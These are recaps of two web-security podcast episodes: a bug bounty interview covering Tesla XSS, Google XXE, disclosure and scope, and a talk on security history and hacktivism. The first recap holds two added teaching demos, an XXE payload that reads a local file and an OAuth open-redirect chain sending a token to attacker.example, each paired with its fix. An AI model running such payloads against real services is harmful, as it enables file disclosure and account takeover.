Undetected e.02 recap: Fredrik N. Almroth – Bug Bounties

Bug bounties – some argue that this is one of the buzzwords of the decade in the cybersecurity industry. Whatever you want to label it, it’s a trend that we can’t ignore these days. A lot of companies are taking part in it, so what’s it all about? 

There were many valuable soundbites to take from this, and especially from podcast guest, Fredrik N. Almroth (@almroot) because he’s hacked all the tech giants and more. If you can name it, he’s probably hacked it. We’ve taken highlights from this bug bounties episode, and the dialogue has been edited for brevity. Let’s dive in:

Image: Fredrik Nordberg Almroth, Disposable mail co-founder, security researcher and world-class bug bounty hunter

Undetected – a web security podcast is a Disposable mail production that uncovers different depths of web security. You can listen to the full length of Episode 2 on SimpleCast or your preferred podcast platform. The video version is also available online.

Fredrik and his take on the evolution of web security

Fredrik: Well, I’m a security researcher and co-founder of Disposable mail and… I hunt for bug bounties, which kind of correlates to how we do things in Disposable mail. I started already in high school … when I met my fellow co-founders of Disposable mail. By that point we realized that, well the Internet is quite broken. This was back in 2006 when we first met and by 2008, we decided to start a consultancy business doing penetration testing. But one thing led to another and we started automating things and this idea kind of grew. So we all went to university and dropped out one after another. And by this point, some ideas started to stick, like crawling is pretty good to find your URLs on the website and if you have query parameters in URLs then you can start looking for SQL injection.

Then Cloud started becoming a buzzword around here in Sweden. So we figured why not make a new company doing something else.

Laura: We have taken quite huge strides when it comes to security in these past few years as well. How do you feel that automation, for example, played into this?

Fredrik: You can say that some vulnerabilities come and go. SQL injection was a lot more out there a couple of years ago, but now it’s mostly been abstracted away by different frameworks and so forth. But at the same time, you now have server-side template injections, and it’s basically the same kind of injection attack.

They come and go, but in different forms over the years. Now there’s more out on the internet, more services, more technologies in general. There are more things, hence more things can break, but at the same time, the vulnerabilities that existed back then are not as common nowadays, except for XSS.

Laura: It (web security) really evolved and the hacks in general. The Tesla hack you did was a cross-site scripting attack. Right?

Tesla DOOM DOM XSS

Fredrik: Tesla was running Drupal at the time, and Drupal was bundled with a “what-you-see-is-what-you-get” kind of editor called CKEditor, and this library comes bundled with an example file. Using this example file you could do a drag-and-drop XSS, where you drag something that looks okay on one website onto some other place, and it executed in Tesla’s origin… And then you have cross-site scripting – Tesla DOM DOOM XSS. So what I demonstrated was that you could play Doom on Tesla’s website; I replaced the entire window with the game Doom.

Laura: That sounds like fun. Couldn’t play Doom anywhere else?

Fredrik: Yes, it’s, well I packed away this payload because it was fun. So I use it every now and again in various cross-site scripting demonstrations.

Getting read access on Google

Laura: Also a bigger vulnerability that you found previously was back in 2014 when you found an XXE vulnerability in Google. Basically you were able to run your own code on Google’s server. 

Fredrik: While the company wasn’t low on cash yet, Mathias Karlsson (a co-founder) and I figured that bug bounty actually works as a way to collect some money. So what’s the most bang for the buck? What companies are out there that we can hack and get the most money for the least amount of effort? Facebook or Google.  

Well, Facebook is not very fun to target, so we went for Google. Our approach was: we should find the newest features and products or go for the really old legacy stuff that they might’ve forgotten. So using Google search itself, we found a feature that dated earlier than 2008 called the Google toolbar button gallery. So if you remember this way back in the Internet Explorer, you had this toolbar from Google and companies could upload their own buttons to this toolbar and that was the feature we attacked. This was an XML file uploaded to Google.

You as a website owner could add your own button to the toolbar so that other users could find you. This button definition was an XML file and quite frankly, you can do a lot of weird things in a plain vanilla XML file, and an external entity is one of those.

Fredrik: We uploaded a file and gave it some name and description, etc, but we added a definition that instructed Google to try to read another file from their local file system. So we tried to pull the normal user file on Unix systems and uploaded it and it worked. But we asked, “Okay, did anything actually happen?” 

We made another attempt where we changed the title to something like “hello world”, and then searched on Google or for toolbar buttons containing “hello world.” … meaning we searched for what we just uploaded.

Laura: That’s kind of like local file inclusion.

Fredrik: Yeah, that’s basically the impact. We got read access on Google.com. This was quite fun. So from start to stop, it took us four hours to identify, exploit and have it reported.
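What an external entity does to an uploaded definition like the one described above, as an added worked example that is not part of the episode or of any real toolbar code: a constructed button XML declares a SYSTEM entity pointing at a local file (a temporary file standing in for the Unix user file Fredrik mentions), and the same upload is run through Python’s standard-library SAX parser twice, once with external general entities enabled (the vulnerable server’s behaviour) and once with the safe default. The element names, the file contents and the choice of parser are assumptions made for illustration.

```python
import io
import os
import tempfile
import xml.sax
from xml.sax.handler import ContentHandler, feature_external_ges

# Constructed stand-in for the toolbar button definition described above.
# The DOCTYPE declares an external entity pointing at a local file, and the
# <title> references it, so a parser that resolves external entities pastes
# the file's contents into the title, where it later shows up in search.
BUTTON_XML = """<?xml version="1.0"?>
<!DOCTYPE button [
  <!ENTITY xxe SYSTEM "{path}">
]>
<button>
  <title>hello world &xxe;</title>
  <description>constructed demo button</description>
</button>
"""


class TitleCollector(ContentHandler):
    """SAX handler that gathers the character data inside <title>."""

    def __init__(self):
        super().__init__()
        self.in_title = False
        self.parts = []

    def startElement(self, name, attrs):
        if name == "title":
            self.in_title = True

    def endElement(self, name):
        if name == "title":
            self.in_title = False

    def characters(self, content):
        if self.in_title:
            self.parts.append(content)


def parse_title(xml_bytes: bytes, resolve_external_entities: bool) -> str:
    """Parse the button XML and return its title.

    resolve_external_entities=True mimics the vulnerable server: the SAX
    parser fetches SYSTEM entities, so file contents land in the title.
    False is the safe default (Python >= 3.7.1): the entity reference is
    skipped and only the literal title text survives.
    """
    parser = xml.sax.make_parser()
    parser.setFeature(feature_external_ges, resolve_external_entities)
    handler = TitleCollector()
    parser.setContentHandler(handler)
    parser.parse(io.BytesIO(xml_bytes))
    return "".join(handler.parts).strip()


def demo() -> tuple:
    """Write a constructed secret file, then parse the same upload both ways."""
    with tempfile.NamedTemporaryFile("w", suffix=".txt", delete=False) as f:
        f.write("root:x:0:0:root:/root:/bin/sh\n")  # constructed passwd-style line
        secret_path = f.name
    try:
        upload = BUTTON_XML.format(path=secret_path).encode()
        leaked = parse_title(upload, resolve_external_entities=True)
        safe = parse_title(upload, resolve_external_entities=False)
    finally:
        os.unlink(secret_path)
    return leaked, safe


if __name__ == "__main__":
    leaked, safe = demo()
    print("vulnerable parser title:", leaked)
    print("hardened parser title:  ", safe)
```

The search trick in the story corresponds to reading the title back: with entities resolved it carries the file contents, with the default it holds only the literal text. The fix on the defending side is the same whichever library is used: keep external entity resolution off (Python’s SAX parser does so since 3.7.1, lxml needs resolve_entities=False) and treat every XML upload as untrusted input.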

Start of bug bounty career:

Laura: Were these all bug bounty programs or were they public programs that you enrolled in or how did you stumble across these?

Fredrik: This was about the time that we actually founded Disposable mail and bug bounty started becoming something you spoke about on Twitter. So Google, in my world, was the first company I saw that had this kind of policy, meaning anyone can hack Google. If they manage to do it and Google accepts it as a new unique vulnerability, you get money for it and afterward, you can speak about it. As an early-stage startup, this was nice to have some material to be seen and heard.

Laura: How did people react to your work on bug bounties back then?

Fredrik: It varied. People in Silicon Valley know about this, as that’s kind of where this entire industry started. But over here in Sweden, it was unheard of that this was even a possibility. For example, a friend of a friend of mine happens to work for the Swedish Police, and I told him about the Dropbox hacking event which I attended in Singapore, and his response was, “What? You can’t do that. That’s criminal.” I said, “No, no, no, you missed the point.” I had to elaborate a bit on what bug bounty is and so forth.

Laura: In our bubble of Infosec, everyone knows what a bug bounty is or what responsible disclosure is, but outside of this immediate bubble, it is not that obvious. What is your short description of bug bounties?

Fredrik: Bug bounty is freelance penetration testing in a way. Anyone on the Internet can go to a company, find a vulnerability and have a streamlined process of reporting it to the company. If it’s a unique vulnerability and you are the first one to submit it, then you get a monetary reward at the end. Now we have platforms and marketplaces to facilitate this among vendors and researchers such as Bugcrowd, HackerOne and Synack.

Laura: Yes, and bug bounties are offering a [monetary] reward or swag in exchange for the vulnerability report.

Responsible Disclosure Policy – that’s all it takes:

Laura: These bug bounties have basically lifted hackers out of the darkness, and now hackers can actually talk about what they have found. They can disclose it, depending on the program. It’s also shedding a more positive light on hackers.

Fredrik: Indeed. But I think it’s quite important to speak a bit about Responsible Disclosure programs as well, since it’s basically the first stepping stone to do something like this. It could be as simple as having an email address or a contact form where someone can submit vulnerability information. That’s all it takes.

More often than not, you (an ethical hacker) know it yourself that there are vulnerabilities all over the place, but it can be quite tricky to report it.

And you (application owner), you don’t always have to offer swag or money. You just have a channel to accept it.

Laura: A common practice out there is putting a security.txt file in your domain so that people find the contact information of your security personnel there for reporting.

Is this the minimum thing that a company should do in terms of Responsible Disclosure?

Fredrik: Security.txt is a very good starting point. With that, you can set up a [email protected] email (to receive reports).

Laura: So you don’t need to go on a commercial bug bounty platform and open a program there?

Fredrik: No, I think that should come a bit later once you have matured your security processes, so you know what you get basically. It can be quite overwhelming if you go directly to one of these platforms, open a bug bounty publicly to the world because everyone will start reporting straight away.

Laura: Do you think that a company who enlists in a public program will get a ton of reports right from the get-go?

Fredrik: More in the beginning, and then it should probably slow down.

Laura: Would it make sense then to do some kind of security assessment before that?

Fredrik: Yes. I think you should only start with a Responsible Disclosure Policy. 

Once you’ve had your pentest reports, some automated scanning and an organization that can handle the security reports, then you should consider a Responsible Disclosure Policy or a private bug bounty program. After that, you could make it public.

Laura: Do you feel that offering a bug bounty program is appropriate for all sorts of companies out there?

Fredrik: Yes, I think so as long as you have some kind of online presence. But it has to be something technical. It’s quite hard to have a bug bounty otherwise. Even manufacturers of hardware, for example, are growing with IoT applications. These could open up as bug bounty programs.

Laura: Yeah. I’m just trying to think of something that wouldn’t have an online presence these days.

Fredrik: But everything has, right?

Laura: Yeah. Everything has at least a company website, if nothing else.

Fredrik: Exactly. You always have something important to your business and you can probably make a bounty program around that. Ask yourself what you are trying to protect. Say you are Dropbox. The most sensitive things would be your users and their files, right? If you’re Apple, well, it’s basically everything, that’s a bad example I guess. For a bank, it’s probably the money.

So then it doesn’t really matter if it’s only one domain. That’s the scope for your program. You should really try to think about this, “what am I trying to protect?” and make a policy thereafter.

Setting the scope of your disclosure program:

Laura: You mentioned “Scope”, and the scope in a bug bounty program is defined by the company and it can be a domain or source code or some device.

Fredrik: Yes, it’s usually along those lines. It’s one or several domain names, or it can be mobile apps, GitHub repositories, etc. If it’s a hardware manufacturer, it could be the devices they sell to consumers. There are also a lot of blockchain companies, where you would be attacking the blockchain technology itself.

Laura: What is the best scope for you as a bug hunter?

Fredrik: For me privately, the bigger scopes the better. Being a security researcher, you have a bit of an arbitrage. The more things that are exposed and that you can audit, the more things will break, as simple as that. The bigger the company, the easier it is in my opinion, and that’s because a bigger scope means more critical vulnerabilities and that’s more business impact. So it will help you as a company even more.

Laura: So what happens if you go outside of a scope in a bug bounty program?

Fredrik: That really depends on the organization. What really matters in a bug bounty program is the business impact that an outsider can have. So unless something is explicitly out of scope, it could be fine to report a vulnerability if it has a proven impact.

That’s my take on it. Although that could also be considered scope creeping if you do this.

Laura: What is scope creeping?

Fredrik: You go a bit out of scope and in again. For example, if you find something on Adobe and you go outside to some local subsidiary or something and then back into scope. More often than not, it’s generally accepted at these live hacking events.

Laura: Maybe at the live hacking events, the overall environment is easier to control than hacking otherwise.

Fredrik: In these events, they collect a group of people to hack a company over a day or two in person. Then you have all the stakeholders at one place they can communicate about it.

Laura: Do some security researchers not report something if it’s out of scope and if it’s not that critical?

Fredrik: 100%. I really believe so. For example, Open Redirect is no longer on the OWASP Top 10. If you find an open redirect somewhere on a subdomain that might be explicitly out of scope, even though you know it’s there, you wouldn’t report it, with the risk of losing a score or reputation or what-not on one of these platforms.

But at the same time, if they have OAuth and it’s misconfigured, I can use it to do some kind of authentication bypass or steal some sensitive tokens. Then all of a sudden you go out of scope, then in again, and you might have an account takeover, and that would usually be considered critical.

And that companies would accept.

Laura: So it really depends on the impact and if you can demonstrate the impact.

Fredrik: Exactly. That’s, I think that’s the moral of the story. It’s the impact that matters. You need a proof of concept. Otherwise it’s kind of a void report.

Laura: Yeah. Because I used to work as a pentester and during an assignment you have limited time as well, so you don’t always have to provide the proof of concept. Pentesters look at it from a wider angle and they can see white box, the infrastructure, the servers and so on. So for me, it’s interesting how impact-driven the bug bounty community is. It’s a good thing.
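The OAuth chain Fredrik sketches above (an out-of-scope open redirect turned into token theft) as an added example, not from the episode: a simulated authorization server with a host-only redirect_uri check beside an exact-match check, and a constructed open redirect on the in-scope host that bounces the browser to attacker.example. All hosts, paths, the open redirect endpoint and the token value are hypothetical.

```python
from typing import Optional
from urllib.parse import parse_qs, urlsplit

# Constructed setup: one client app with one registered callback. All hosts
# are hypothetical and chosen for the example.
REGISTERED_REDIRECT_URIS = {"https://app.example.com/oauth/callback"}


def weak_redirect_check(requested: str) -> bool:
    """Host-only matching (a common misconfiguration): any https URL on the
    registered host is accepted, including an open redirect endpoint."""
    req = urlsplit(requested)
    registered_hosts = {urlsplit(u).hostname for u in REGISTERED_REDIRECT_URIS}
    return req.scheme == "https" and req.hostname in registered_hosts


def strict_redirect_check(requested: str) -> bool:
    """Exact match against the pre-registered URIs (RFC 6749's recommendation)."""
    return requested in REGISTERED_REDIRECT_URIS


def open_redirect_endpoint(url: str) -> str:
    """Simulates https://app.example.com/redirect?url=..., a constructed open
    redirect on an otherwise in-scope host: it forwards to whatever `url` says.
    URLs without a `url` parameter are left alone (normal pages don't redirect)."""
    q = parse_qs(urlsplit(url).query)
    return q.get("url", [url])[0]


def deliver_token(requested_redirect_uri: str, check, token: str) -> Optional[str]:
    """Where does the token end up?

    None if the authorization server refuses the redirect_uri; otherwise the
    final URL after any redirect. The token rides in the URL fragment (as in
    the implicit flow), and a 302 whose Location has no fragment makes the
    browser keep the original fragment, so it follows the redirect.
    """
    if not check(requested_redirect_uri):
        return None
    landing = open_redirect_endpoint(requested_redirect_uri)
    return f"{landing}#access_token={token}"


def demo() -> dict:
    """Run the constructed attack URL and the legitimate callback through both checks."""
    attack = "https://app.example.com/redirect?url=https://attacker.example/"
    legit = "https://app.example.com/oauth/callback"
    return {
        "weak_attack": deliver_token(attack, weak_redirect_check, "t0k3n"),
        "strict_attack": deliver_token(attack, strict_redirect_check, "t0k3n"),
        "strict_legit": deliver_token(legit, strict_redirect_check, "t0k3n"),
    }


if __name__ == "__main__":
    for name, landing in demo().items():
        print(f"{name}: {landing}")
```

In the weak case the authorization server accepts any URL on app.example.com, the open redirect forwards the browser, and the fragment carrying access_token arrives at the attacker’s origin; that end-to-end impact is what turns an otherwise ignorable open redirect into a critical report. Exact matching of the full redirect_uri closes the chain no matter what else lives on the host.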

Bug bounty is a growing industry

Laura: Bug bounties have become a big industry, but it has also gotten some criticism or scrutiny over how many active researchers there actually are, like this Dark Reading article by Robert Lemos, “Bug Bounties Continue to Rise, but Market Has Its Own 1% Problem”.

It’s kind of like the same as being a professional in anything, like a professional basketball player. And I think that was also something that was said in Lemos’ article, most likely a quote from Mårten Mickos, that not everyone is going to succeed. And then there’s a group who succeed, and they are really, really good at what they do.

Fredrik: Right. A lot of people are drawn into what they see on Twitter and the media that bug bounty is a growing thing. People go around on these live events where it’s an open environment and everyone always finds something critical, which is true. But to get there, that’s the hard part.

A vast majority might not have a professional take on how to report vulnerabilities, and then it might be people like yourself coming from pentesting background without experience on the same style of reporting.

Laura: … And having all of them rejected.

Fredrik: That’s the thing, right? If you go in with the mindset of a pentester, then I don’t think you would grasp it well, and it probably would be a bit discouraging. And once you get the grasp of it, then you need to beat the rest that are in the game with vulnerabilities that will be accepted. So I think it could be a steep curve to get into.

Laura: You have been active since 2013 so you’re well ahead of people who are only starting out now. What are tips you have for beginners when trying out bug bounties?

Fredrik: Learn by doing. Submit reports and see how it works, and when it works. There are a lot of good resources out there and streamers that speak about how to do bug bounty, and educate people on what to look for.

Laura: What do you recommend?

Fredrik: I’m going to be a bit biased here, and recommend our fellow coworker, TomNomNom. I also like STÖK, a Swedish researcher.

Anything that Bug Bounties aren’t good for?

Laura: What is something that bug bounties are not really good for?

Fredrik: It’s not a silver bullet to your security. It’s a nice addition to an already quite mature organization in terms of security. It’s the many-eyes principle meaning you have more people looking and trying to break something – and someone will eventually be able to do that. 

If you start a bit premature with doing bug bounties as a company, chances are that it will be a bad experience for researchers. For example, it sucks for me if I report a vulnerability and it gets flagged as a duplicate. I’m probably not the first one to be flagged as a duplicate.

Laura: Or if the companies are slow to respond?

Fredrik: Yes. It must be horrible for the company as well. They get an overwhelming amount of reports and can’t act on them fast enough, so then it’s not nice for anyone.

Start with private and then slowly expand the scope and amount of people that participate in your program and have it as an addition.

Laura: It’s a good way of getting rid of those low hanging fruit and understanding what you’re exposing there?

Fredrik: No, on the contrary. The bug bounty community will find all of it. They will find the XSS’s. If you can’t fix the XSS fast enough, then you will have a problem.

Laura: You will have multiple reports on the same XSS.

Fredrik: Yes, you will. The best researchers tend to go for more creative vulnerabilities and you want them to be looking deep into your system and catching hard-to-find things.

Laura: Do you think that all companies get equal treatment from bug bounty hunters as well?

Fredrik: No, I don’t think so. It’s absolutely a monetary interest. There are more and more companies joining these platforms, and there’s a limited amount of researchers that provide value. So then you have to compete with other programs to have researchers look at your stuff.

Researchers like big scopes

Laura: We’ve had multiple takeaways for our listeners in this episode already, but do you have any like one big takeaway for our listeners?

Fredrik: If you’re a company, start small, then expand. Researchers love big scopes, so try to reach that eventually. 

If you’re starting off with bug bounty hunting, don’t give up too soon. It takes time and practice to get into this, but it’s not impossible. Anyone can do it. Really. It’s just problem-solving.


Did you like the highlights of this episode? Check out the full episode in the web player. It’s also available on Spotify, Apple Podcasts, Google Podcasts or another preferred podcast platform.

——

Keeping up with the fast-pace of web security is a challenge if you are only relying on standard CVE libraries and annual security checks. Disposable mail works with some of the best ethical hackers in the world to deliver security research and modules from the forefront of security, so you can stay on top of emerging threats. Interested in giving Disposable mail a go? Start your 14-day free trial today.



Undetected podcast e.01 recap: The evolution of web security and hacking

Web security is like an onion, or maybe the deep sea, where there are depths to be uncovered. This is precisely what Undetected – a Web Security Podcast by Disposable mail is set to do. Our new podcast series is hosted by Disposable mail Security Researcher, Laura Kankaala. Each session, she invites a guest speaker to discuss some common security topics from another perspective, and other topics that may not have ever crossed your mind.


In the pilot episode, Laura is joined by Disposable mail co-founder Johan Edholm. He co-founded the company back in 2013, and is still involved with the organization today by managing the technical infrastructure in the clouds. We don’t want to give away too much, but there are some things said that are just too good to not be highlighted, and we’ve summarized some of the conversation:

This episode discusses the evolution of web security, and starts off the discussion on its current state by first going back to where the Internet began for them. Both Laura and Johan are from the same generation, yet their first experiences with the Internet differ.

Guest speaker Johan Edholm (left) and Host Laura Kankaala (right)

Do you remember when your first interaction with the Internet was?

Johan: I remember in the early days we didn’t have the fast Internet connection we have now. Actually, we weren’t even allowed to use computers, really, at home. My dad’s a farmer, and he believed you should work with your hands, and computers are bad… It was very different, everything was slow and taboo, I guess.

Laura: I remember when we got our first computer… it was more like, everyone got to use it. We didn’t have it online but my sister and I used to play a lot of video games.

Johan: We were not really allowed to do that, because dad had his tax documents on the computer and he would say, “Oh no, you’re going to get a virus, and everything is going to be terrible.” We weren’t allowed to touch it. When he was out working at the farm, I actually snuck to his computer anyway, and used it. I remember having to print out into text files to read offline.

Laura: My first experience was with making websites using Geocities, a hosting platform for websites. I also had my first hacking encounter here: my friend’s website was hacked and the person just changed the wallpaper on the website. I thought, “oh, is this hacking? Wow. Who would ever do this?”

When did you first experience hacking or web security?

Johan: IRC was a big part of my early time on the Internet, and security. I got into security fairly quickly, when it came to IT. I wasn’t much of a casual Internet surfer… but I’ve always been interested in this magic kind of thing. Before that, it was more literal, the sleight of hand and illusions. I think hacking has the same feeling. If someone does something that’s out of this world, I want to understand how the fuck that works. It annoys me when I don’t. That’s when I started to look into it, and that was fairly quick into this whole Internet journey, I guess.

I read a lot of those magazines, or similar texts where people were talking about hacks, and I guess those were probably the earliest experiences of things being hacked, without me actually seeing it for myself, just reading about it.

What about phreaking?

Johan: Back then, hacks were mainly teenagers pranking, and phone phreaking was a big thing because way back you didn’t have the Internet, but you had phones. Maybe you wanted to call someone, and it was really expensive so people wanted to bypass that. If you read Kevin Mitnick’s book, Art of Deception, he uses it a lot when he’s doing other shenanigans like social engineering.

Laura: Yeah, Kevin Mitnick is probably one of the OG hackers out there.

Johan: He’s definitely one of the most famous, at least. He was chased by the FBI, and was on their top wanted list for a bunch of years. He has written a lot of books regarding social engineering, and security in general. And I’ve read Art of Deception myself. It was a long time ago, that was in my early, early days of security, I’d say. But that one is fairly good when it comes to social engineering. 

How did the industry look when you started working with security?

Johan: In 2008, myself and the other founders turned 18, so we could actually register our first company. But I think it started in 2007, just not too seriously. We were just nerds, trying to build something because it’s fun.

Laura: What was the initial thing that you were working on?

Johan: It was the same scanner as we have now [in Disposable mail]. We wanted to automate security. Back then, the idea was to maybe be consultants since that was what everyone was doing, so it seemed like an easy thing. But then we’re lazy, so we figured we could just automate. Might as well, right?

Then, this whole cloud thing was growing, and I guess we were early jumping on that train.

Laura: Nowadays, we have: bug bounties, consultants, pentesters, a lot of people working in this field and it’s constantly growing. How was it back then in 2008?

Johan: How I remember it was that security people were mostly consultants. Of course, you had these security products, but generally, things moved slowly and were enterprise-y. Security was very much a product for the enterprise and for people with money. It’s not like a 10-people company would hire a pen tester. That’s usually very expensive.

Also, the vulnerabilities you saw were simpler. It’s getting more and more complex now with bigger systems. You need to find flaws in how they interact with each other. Back then, it was often quite straight forward. I think that’s a symptom of this: few people that could afford security. 

Bug bounties weren’t a thing then. I know Netscape had one around ’95, but nobody knew about it. Or, at least I didn’t. That’s not web. It was the browser, not the Internet itself. The whole feeling around it was very different.

Laura: What were the top three vulnerabilities at the time?

Johan: My feeling is that it was mostly SQL injections, those were very common. They had a very large impact. They, of course, are still around a bit today, but it’s much, much more rare. Back in the days, those were everywhere.

Then, remote code executions, they were, compared to now, much more common. It’s very basic. Now, you have SSRF, rather, which is the new RCE, almost.

The third? I would say file inclusions, like local or remote, even. They were fairly big as well, if you count the impact.

One thing that’s stayed is XSS. These vulnerabilities might have changed shape, but are still around, and probably even bigger now.


RCEs today:

Laura: What you said about the RCEs and comparing them to SSRFs is interesting, in that you think they are the new RCEs.

Johan: That’s more or less what we see nowadays. When you get that impact, it’s usually not the standard RCE. Before we could really have RCE in a query string, like in the URL.

Now things are much more complex, so you use the complexity of an application against itself. It makes things really hard to detect, I think, as well. Or, harder at least, to detect those kinds of things often.

What about Hacktivism?

Laura: One thing that I feel has changed, also, over the years, is the role of hacktivism.

Johan: Yeah, I think so too. I would attribute that, partly, to bug bounties. Now, people have a legal alternative to make a lot of money, even, on hacking. Back in the days, people wanted to have fun. Pranksters or teenagers were defacing websites, or changing the background and look of a website, to spread a message, or just because they were bored.

Laura: Yeah, it feels like, back in the days hacking was more political. Hacktivism basically stands for having some kind of political agenda, or some kind of bigger agenda behind hacking. For example, collectives such as Anonymous.

Johan: Yeah, that’s my impression as well and maybe they’re just more careful or hidden. Maybe they do a lot of things behind the curtains that we don’t see, and they could, for example, dump things to Wikileaks.

Back then, people really wanted to make a name for themselves, as well, often tagging releases with the group name, like Anonymous. There was also Lulzsec, that was fairly big in this. I’m not sure if they had much of a political message, to be honest, but at least they liked to tag it.

Going from hacktivism to bug bounties:

Laura: I think bug bounties have made a difference for individuals when it comes to security, because now they have a platform for reporting these things as long as they stay in scope, and work accordingly to the agreed rules and policies in there.

Johan: People often hack for the challenge. Now, when they have a legal alternative to it, they can brag about it on their high score lists rather than having to deface a website, and write their name on it. They have a more ethical alternative, which is very good.

Hacktivism is not completely dead:

Laura: Hacktivism is not completely dead, though. For example, just recently, a hacker going by the name of Phineas Fisher announced a bug bounty program for hackers, basically.

Johan: That was also delivered as one of those pure text files, that are very popular. I read it, and it brought a lot of nostalgia, to be honest. That was a very strong political statement, and something one often saw, I think before our time. I’m born ’90 and I think that style was more common in the ’80s. But the message that’s in that is a lot like, “Fuck Capitalism.”

Laura: For example, this is a quote from that manifesto. They said that, “Hacking to obtain and leak documents with public interest is one of the best ways for hackers to benefit this society.” I think this is an interesting message. Naturally, I think it’s not that outdated, but when it comes to Responsible Disclosure, or Bug Bounties, these kinds of ideas don’t typically come out in bug bounties. Rather, they never do, because in bug bounty programs they ask you not to leak information, or to responsibly disclose the vulnerabilities that you find.

Johan: We might call it responsible disclosure, but I guess, the hacker in this case would not call that responsible… This hacker claims to be a she, so I’m going to refer to that. She says rather, how to best benefit society by leaking documents, etc. I guess it’s very subjective, what’s responsible in that case.

Laura: Absolutely. They are also offering up to $100,000 for hackers who are able to leak some kind of documents. I don’t know where this money comes from, but they are paid in Bitcoin or other cryptocurrency. I consider this hacktivism when one is asking for these kinds of leaks.

Becoming IT security professionals:

Laura: We are both working as professional security people today. When I was studying, for example, it never occurred to me that I could be a pentester. Only when I entered the IT field, and I worked as a SysAdmin for a bit, was I able to change to a pen tester role. Only then I understood that, okay, this is actually a career, and you can make a career out of this.

I think you had this realization much earlier than I did, because back in 2008, you were already in this line of work.

Johan: My dad’s a farmer, he worked with his hands, and his dad was also a farmer, on the same farm even. On my mom’s side, they were plumbers. So, for me, I never saw it as a possibility to work within the IT field. That was something you did as a hobby, like playing chess or something.

I remember when that clicked for me, it was when I saw there was a school that I actually ended up going to, an IT school here in Stockholm. I was like, holy shit, you can actually work with this? Is that a profession? I had never accepted that. All the way until 2007, or 2008, it wasn’t that big, you didn’t hear that much about it then. I’m not sure if I really realized that security specifically could be a profession for me, either.

I honestly wasn’t even sure if I wanted to work with IT. It was more like, I think it’s fun, and I find it fairly easy. But, do I want to have this as a profession or as a hobby?

Shifting everything to be online:

Laura: A lot of our lives are actually happening online. We have social media, we have our banks, our health, everything is online. It has also become more profitable to hack into these things, also for personal gain. If you are a malicious actor, and you are able to hack into a company, or steal data from them, that can be directly profitable for you, if you sell that data on illegal marketplaces.

Johan: Yeah, exactly. I’d say, further back people mostly had websites to show where they had their store, maybe. Now, you have the store online, and you have all the user records there: who buys from you, and maybe even their history, etc. All that can be valuable for some people. If nothing else, it could be useful for doing other attacks, like spear-phishing attacks (scamming people by stalking them) which make these kinds of scams much more successful.

You have a higher incentive to actually hack things. You don’t have to go through your house to break in to look at them, you can do it overseas. It’s a very easy way to be a criminal as well, I guess.

Do you feel that the security landscape is getting better?


Johan: Yeah, I would definitely say it is, actually. We’re getting better at both defense and offense. It’s harder now than it was 10 years ago to get into a fairly good security level. Because we have evolved, you have to understand more things, and you have to work your way to patch a lot of the common problems. There are a lot of frameworks that, by default, aren’t vulnerable to SQL injections.

When you use frameworks, one patch can fix a lot of things, and I think we have been fairly good at that, by raising the security awareness. Of course, there are still a lot of good hackers, and you can still make mistakes, but I would say it’s better now.

Laura: More on that, the frameworks already have these built-in mechanisms to mitigate this; they filter the input or the output that comes to or from the web application, so that using those web applications is safer for end users today.

Johan: We have learned from our mistakes, and are switching things to be safe by default. If you have some edge case where you don’t want that kind of security mechanism for some reason, it’s an opt-out, rather than opt-in. I think that’s really the change we have seen, and that we will hopefully continue to see.

Laura: Today there are a lot more tools that can provide automated security. And there are also consultants, and a lot of different kinds of pentesters, with different knowledge and focus areas. It’s easier to also buy security, these days.

Johan: If you feel you have the resources to actually fix things, you can also start a Responsible Disclosure program. You don’t even have to pay people, but people might look at your things anyway. Or, if they accidentally find something, they know how to contact you.

Responsible Disclosures can be fairly useful, because people can show it off on their resumé to help their career or online profiles, so they get invited to [private] bug bounty programs. There are a lot of those as not every [organization] wants to be public with their bug bounty program. 

It’s a win-win. You get help with your security, and they get credit for it, of course.

Laura: Yeah, absolutely. I think there must be some people who just want to do this out of good will, as well.

Johan: There are people that are doing security for charity, for example Hackers for Charity, where they actually just purely do it out of good will. I would expect some people maybe want to exercise their skills just to get a technical challenge.

We’ve talked a lot about the past and the current state of security, and the new trends that have been emerging. But, where do you see us going from here?

Johan: I think all these frameworks, or CMSs, or even programming languages will become even better at making people make good decisions, when it comes to security. So, security by default, or maybe even have it the way Theo de Raadt, the creator of OpenBSD, puts it: something like, “Optional security is irrelevant,” where you don’t have a choice. But, I think we’ll become better at that.

Of course, automation is a thing, definitely. Quite obvious, in this case, when it comes to Disposable mail since that is what we do. But I really believe in that. As I mentioned, it’s harder and harder to get into the field of security, and there are fewer and fewer [individuals] that are doing this original [security] research. So we need to distribute that knowledge.

The futuristic way of security with automation and hacker collaboration:

Johan: Not everyone can learn to hack that well, and those insights shouldn’t be only for those few that can, or the few that can afford to hire these people. If you look at Google’s bug bounty program, or Facebook, or some others, they have an enormous budget. Obviously, that won’t go for everyone.

It’s not just the organizations themselves that would suffer from this, it’s all the users of the smaller websites, and organizations. What we need to do is find ways to distribute that knowledge, to spread that knowledge so we can get a more secure Internet experience.

That’s partly what we do. We try to take this knowledge from the few [Disposable mail Crowdsource], and automate it so it can reach many more people. But knowledge would also go into those open source tools, or CMSs, or similar. I think that’s a futuristic way to look at security. At least, that’s what I believe, and hope for as well, so we don’t get too centralized, where there’s a few services that you feel like you can’t actually trust because those are the only ones that can afford this kind of thing. It’s not just super big enterprises and nation states, it’s [security] actually more for everyone.

Ultimately, we need to protect the end user:

Laura: Absolutely. Even though companies need to be the ones enforcing security, a lack of security will always affect the end users in one way or another. Either their data is compromised, or their devices are compromised. The target for malicious actors is either a group of people, opportunistically everyone, or a really specific target, like one person.

Johan: That’s a lot of the point. If your company gets hacked, of course you as a company will suffer, it will damage your brand, and might have a lot of financial costs and things, but it also affects everyone that’s using your service. Or, if they have their personal data on that service, maybe other things that are even more sensitive, like Bitcoin wallets, that could have a huge cost for people.

Something more subtle would be like your email being leaked so now you get a lot of spam. That’s annoying, but it could lead to a lot of different things, depending on how you use it, and what kind of company it is. The point is, it’s not just the organizations that suffer, it’s all the users of it. We need to help everyone be more safe, or secure.

Full video episode on Wistia or find it on the Disposable mail YouTube channel:

Did you like the highlights of this episode? Check out the full episode of the Undetected podcast and the following episodes in the web player. It’s also available on Spotify, Apple Podcasts, Google Podcasts or another preferred podcast platform.

——

Keeping up with the fast-pace of web security is a challenge if you are only relying on standard CVE libraries and annual security checks. Disposable mail works with some of the best ethical hackers in the world to deliver security research and modules from the forefront of security, so you can stay on top of emerging threats. Interested in giving Disposable mail a go? Start your 14-day free trial today.
